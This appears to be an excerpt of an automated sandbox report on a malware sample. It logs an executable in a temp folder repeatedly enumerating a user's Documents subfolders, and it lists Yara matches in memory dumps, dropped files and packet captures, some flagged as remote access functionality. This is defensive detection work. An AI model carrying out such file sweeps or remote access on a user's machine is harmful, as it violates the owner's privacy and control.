Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: number of queries: 1770
Source: Yara match File source: 0000000B.00000003.2620037561.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2785733963.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2604132730.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2664262344.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2663928952.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2603773117.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2623464968.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2636516772.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2786592123.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2640348018.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2623251409.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2799731430.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2603721155.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2641351631.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2604385825.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 1168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 6376, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000015.00000002.2921279103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8X6R8OO7U6CNLMSAL.exe PID: 4192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 1168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 6376, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 15.0.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2900581975.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2537460651.000000000095E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2654891019.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2881192763.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.2678859508.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2695730886.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2864835627.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.2883036920.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2731328670.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2695281635.000000000094B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2730538903.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2496940953.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2821857520.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2538148341.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2867421028.000000000162B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 4144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 6996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 2716, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP